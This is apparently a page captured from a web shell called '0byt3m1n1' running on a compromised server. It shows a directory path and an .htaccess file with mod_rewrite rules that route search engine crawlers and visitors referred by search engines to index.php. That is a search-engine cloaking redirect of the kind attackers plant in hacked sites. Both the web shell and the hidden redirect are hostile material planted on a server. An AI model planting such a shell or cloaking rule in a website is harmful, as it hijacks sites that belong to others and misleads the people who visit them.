0byt3m1n1
Path:
/
data
/
19
/
3
/
132
/
7
/
3784170
/
user
/
5401187
/
[
Home
]
File: .htaccess
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing) RewriteRule ^.*$ index.php [L] </IfModule>